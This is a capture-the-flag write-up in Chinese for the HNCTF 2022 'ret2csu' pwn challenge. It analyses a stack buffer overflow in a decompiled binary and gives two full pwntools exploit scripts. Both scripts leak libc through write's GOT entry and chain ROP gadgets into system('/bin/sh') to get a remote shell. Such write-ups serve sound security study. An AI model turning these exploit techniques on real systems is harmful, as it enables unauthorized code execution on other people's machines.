HNCTF 2022 week2-ret2csu Writeup
检查文件保护
开了NX保护
分析
main函数
int __fastcall main(int argc, const char **argv, const char **envp)
{
setbuf(stdin, 0LL);
setbuf(stderr, 0LL);
setbuf(_bss_start, 0LL);
write(1, "Start Your Exploit!\n", 0x14uLL);
vuln();
return 0;
}有一个vuln函数
vuln函数
ssize_t vuln()
{
char buf[256]; // [rsp+0h] [rbp-100h] BYREF
write(1, "Input:\n", 7uLL);
read(0, buf, 0x200uLL);
return write(1, "Ok.\n", 4uLL);
}读取输入最大512(0x200)个字节到buf,但buf大小为256,所以存在缓冲区溢出.
利用姿势
根据题目介绍,这题是ret2csu,所以着重看_libc_csu_init函数的汇编,有了可用的寄存器后,正常打ret2libc libc_csu_init函数的汇编重点段
下图中存在两个csu:
这里我们使用下面那个csu
接下来计算偏移量为264
ROPgadget找一下我们能用的gadget:
EXP
#-*- coding:utf-8 -*-
from pwn import *
# import duchao_pwn_script
context(log_level='debug',arch='amd64', os='linux')
pwnfile= './ret2csu'
# io = process(pwnfile)
io = remote('host',port)
elf = ELF(pwnfile)
rop = ROP(pwnfile)
libc_file_path = './libc.so.6'
libc = ELF(libc_file_path)
padding = 0x108
leak_func_name ='write'
leak_func_got = elf.got[leak_func_name]
return_addr = elf.symbols['vuln']
# write_sym = 0x404018
write_sym = 0x404018
# 404018
pop_rdi_ret = 0x4012b3
pop_rsi_r15_ret = 0x4012b1
# gdb.attach(io)
# pause()
pop_rbx_addr = 0x4012AA #在ida找
rbx=0
rbp=1
r12=1 #arg1 rdi
r13=leak_func_got #arg2 rsi
r14=8 #arg3 rdx
r15 = write_sym #call func
mov_rdx_r14_addr = 0x401290 #在ida找
payload = b'a'* padding
payload += flat([pop_rbx_addr , rbx , rbp , r12 , r13 , r14 , r15 , mov_rdx_r14_addr])
payload += p64(0xdeadbeef)*7 + p64(return_addr)
delimiter = 'Input:\n'
io.sendlineafter(delimiter, payload)
# pause()
# u64 => 0x0b 0x12 0x40 0x00 0x00 0x00 0x00 0x00
# u32 => 0x0b 0x12 0x40 0x00
# u16 => 0x0b 0x12
# u8 => 0x0b
# struct.unpack
io.recvuntil(b'Ok.\n')
write_addr = u64(io.recv(6).ljust(8,b'\x00'))
# wirte_addr = u64(io.recv(7).ljust(8,b'\x00'))
success('wirte_addr:'+hex(write_addr))
libc_base = write_addr - libc.sym['write']
# libc_base = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['write']
print('libc_base',hex(libc_base))
system_addr = libc_base + libc.sym['system']
bin_sh_addr = libc_base + next(libc.search(b'/bin/sh'))
success('libc_base:'+hex(libc_base))
# system_addr, bin_sh_addr = duchao_pwn_script.libcsearch_sys_sh(leak_func_name, write_addr)
# print(hex(system_addr))
# print(hex(bin_sh_addr))
'''
wirte_offset = 0xEEF20
libc_addr = write_addr - wirte_offset
print('libc_addr:',hex(libc_addr))
system_offset = 0x48E50
system_addr = libc_addr + system_offset
print('system_addr:',hex(system_addr))
bin_sh_offset = 0x18A156-4
bin_sh_addr = libc_addr + bin_sh_offset
print('bin_sh_addr:',hex(bin_sh_addr))
gdb.attach(io)
pause()
'''
ret = 0x40101a
# io.recvuntil('Ok.\n')
payload2 = b'a'* padding + p64(ret) + p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
# delimiter = 'Input:\n'
io.sendline(payload2)
# pause()
io.interactive()
ret2libc式打法
from pwn import *
io = remote("host", port)
# io = process('ret2csu')
elf = ELF('ret2csu')
libc = ELF('libc.so.6')
context(log_level='debug')
pop_rdi = 0x4012b3
ret = 0x40101a
rsi_r15 = 0x4012b1
# leak high 4 bytes and low 4 bytes of write
io.sendlineafter(b'Input:', b'A' * (0x100 + 0x08) + p64(pop_rdi) + p64(1) + p64(rsi_r15) + p64(elf.got['write']) + p64(0) + p64(elf.plt['write']) + p64(elf.sym['vuln']))
io.recvuntil(b'Ok.\n')
got_write_0 = u32(io.recvuntil(b'Input', drop=True).ljust(4, b'\x00'))
print("got_write_0: ", hex(got_write_0))
io.sendline(b'A' * (0x100 + 0x08) + p64(pop_rdi) + p64(1) + p64(rsi_r15) + p64(elf.got['write'] + 4) + p64(0) + p64(elf.plt['write']) + p64(elf.sym['vuln']))
io.recvuntil(b'Ok.\n')
got_write_1 = u32(io.recvuntil(b'Input', drop=True).ljust(4, b'\x00'))
print("got_write_1: ", hex(got_write_1))
got_write = got_write_0 | (got_write_1 << 32)
print("got_write: ", hex(got_write))
libc_base = got_write - libc.sym['write']
print("libc_base: ", hex(libc_base))
io.sendline(b'A' * (0x100 + 0x08) + p64(ret) + p64(pop_rdi) + p64(libc_base + 0x1D8698) + p64(libc_base + libc.sym["system"]) + p64(elf.sym['vuln']))
io.interactive()HNCTF 2022 week2-ret2csu Writeup
https://zer0ptr.github.io/2025/11/14/HNCTF2022-week2-ret2csu/